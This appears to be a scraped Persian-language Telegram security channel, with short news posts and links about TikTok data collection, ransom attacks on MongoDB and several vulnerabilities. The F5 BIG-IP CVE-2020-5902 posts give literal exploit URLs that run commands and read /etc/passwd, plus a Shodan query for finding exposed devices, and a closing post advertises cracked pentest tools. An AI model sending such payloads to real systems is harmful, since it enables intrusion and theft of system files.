امنیت اطلاعات

فردی پس از مهندس معکوس کردن اپلیکیشن Tiktok برخی یافته های خود را در ردیت به اشتراک گذاشت.

اطلاعاتی که توسط تیک تاک جمع آوری میشوند شامل:
- مشخصات سخت افزاری گوشی (نوع پردازنده، مشخصات سخت افزارها، سایز نمایشگر، dpi، فضای حافظه و ..)
- لیست سایر برنامه های نصب شده بر روی گوشی
- همه موارد مرتبط به شبکه ی ارتباطی
- روت بودن یا جیل بریک گوشی
- پینگ GPS بر روی برخی اشکال اپلیکیشن فعال است که هر ۳۰ ثانیه تکرار میشود
- پروکسی سرور لوکال که برای تبدیل مدیا بکار میرود ولی از آنجایی که هیچ احراز هویتی بر روی آن قرار داده نشده، قابل سوء استفاده است.

قسمت ترسناک ماجرا قابل تنظیم بودن این جمع آوری ها، از راه دور است (هرچند ریورس کردن کتابخانه های مورد استفاده آنها زمان زیادی میبرد زیرا از نسخه ی شخصی سازی شده ی OLLVM بهره میبرند). آنها محافظت های گوناگونی بر روی اپلیکیشن قرار داده اند تا از ریورس نشدن آن اطمینان حاصل کنند. اگر اپلیکیشن متوجه ریورس شود رفتار آن به آرامی تغییر میکند. همچنین برخی تکه های کد بر روی نسخه اندرویدی تیک تاک وجود دارد که میتواند یک فایل زیپ را از اینترنت دانلود کرده و پس از آنزیپ، آن را اجرا کند!

https://www.reddit.com/r/videos/comments/fxgi06/not_new_news_but_tbh_if_you_have_tiktiok_just_get/fmuko1m/?context=1

نکته: البته این فرد هنوز مدارکی برای اثبات ادعای خود منتشر نکرده است اما به گفته ی خودش مطالب و اسناد را در سایت شخصی خود قرار خواهد داد.

#privacy
#tiktok

@sec_nerd

bangorlol's comment on "Not new news, but tbh if you have tiktiok, just get rid of it"

Explore this conversation and more from the videos community

1.22K views03:58

امنیت اطلاعات

https://research.checkpoint.com/2020/apache-guacamole-rce/

حتما بخونید

#guacamole
#cisco
@sec_nerd

Check Point Research

Would you like some RCE with your Guacamole? - Check Point Research

Research by: Eyal Itkin Overview In many companies, the daily routine involves coming to the office each day to work on your company computer, safely inside the corporate network. Once in a while, a worker may need special offsite access and will connect…

558 views07:36

امنیت اطلاعات

نمیدونم این مطلب برامون خطر جانی داره یا نه ولی مقاومت بی فایده ست…

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/adventures-in-atm-hacking/

#atm
#pentest

@sec_nerd

Trustwave

Adventures in ATM Hacking

Previously, I had some experience with PoS (Point of Sale) devices and entertained myself with kiosks at hacking conferences, but never had touched an ATM before. My companion on this saga had already some fun hacking with these devices and had some precious…

720 views07:41

امنیت اطلاعات

در یک کمپین باج گیری بیش از ۲۳ هزار دیتابیس مونگو که بصورت غیرامن در فضای اینترنت قرار گرفته بودند توسط هکرها دزدیده شده و متن باج خواهی بجای دیتای اصلی قرار گرفت.
میزان باج درخواستی معادل 0.015 بیت کوین است و اگر تا دو روز توسط مالک دیتابیس پرداخت نشود، دیتای تصاحب شده توسط هکرها منتشر خواهد شد.

https://www.darkreading.com/cloud/22900-mongodb-databases-affected-in-ransomware-attack/d/d-id/1338271

#mongodb
#news
#nosql

@sec_nerd

Dark Reading

22,900 MongoDB Databases Affected in Ransomware Attack

An attacker scanned for databases misconfigured to expose information and wiped the data, leaving a ransom note behind.

675 views08:03

امنیت اطلاعات

معاون وزیر ارتباطات هستن

#mci
#irancell

@sec_nerd

739 views05:36

امنیت اطلاعات

This media is not supported in your browser

VIEW IN TELEGRAM

آسیب پذیری جدید کشف شده در تجهیزات F5
شناسه : CVE-2020-5902

قابلیت ها: اجرای دستور، حذف یا ایجاد فایلهای دلخواه، از کار انداختن سرویسها و اجرای کدهای جاوا

اسکریپت کشف آسیب پذیری برای nmap:
https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse

پیلود سانسور شده در ویدیو:
https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

#f5
#rce

@sec_nerd

841 viewsedited 04:54

امنیت اطلاعات

پیلودهای سانسور شده در تصویر:

https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

#f5
#rce

@sec_nerd

678 viewsedited 04:59

امنیت اطلاعات

آسیب پذیری مورد اشاره در تجهیزات Traffic Management User Interface (TMUI) شرکت f5 کشف شده است

#f5
#rce

@sec_nerd

455 views05:01

امنیت اطلاعات

#fun

#f5

@sec_nerd

452 views05:02

امنیت اطلاعات

Moodle LMS — SQL Injection using Unicode Characters

https://medium.com/bugbountywriteup/moodle-lms-sql-injection-using-unicode-characters-fe01232f2727

#moodle
#sqli

@sec_nerd

748 views05:05

امنیت اطلاعات

کوئری shodan
https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+

#f5
#rce

@sec_nerd

727 viewsedited 05:25

امنیت اطلاعات

اسکریپت bash یک خطی برای کشف موارد آسیب پذیر f5 در موتور جستجوی shodan

https://gist.github.com/Mad-robot/e8c5a81c87d14c7fe0413be2e912141f

#f5
#rce

@sec_nerd

Gist

Shodan Big Ip RCE

Shodan Big Ip RCE. GitHub Gist: instantly share code, notes, and snippets.

766 views05:46

امنیت اطلاعات

اکسپلویت پایتون

https://github.com/dunderhay/CVE-2020-5902/blob/master/CVE-2020-5902.py

#f5
#rce

@sec_nerd

GitHub

CVE-2020-5902/CVE-2020-5902.py at master · dunderhay/CVE-2020-5902

Python script to exploit F5 Big-IP CVE-2020-5902 . Contribute to dunderhay/CVE-2020-5902 development by creating an account on GitHub.

874 views06:11

امنیت اطلاعات

https://github.com/sailay1996/WerTrigger

#windows
#privesc

@sec_nerd

545 views11:53

امنیت اطلاعات

اکسپلویت جدیدتر برای آسیب پذیری F5 به همراه تصاویر و پیلودهای مختلف از جمله پیلود آپلود فایل

https://github.com/jas502n/CVE-2020-5902/

#f5
#rce

@sec_nerd

898 views12:02

امنیت اطلاعات

1:45

This media is not supported in your browser

VIEW IN TELEGRAM

سلام

تعدادی از دوستان کانال/گروه شروع به قفل شکنی بعضی از ابزارهای گرون قیمت تست نفوذ کردن و ما هم بعد از اطمینان از صحت کارشون، تصمیم گرفتیم ازشون حمایت کنیم

این لینک کانالشون هست که میتونید محصولات و قیمت هارو ببینید

@secstore

@sec_nerd

681 views16:45

About

Blog

Apps

Platform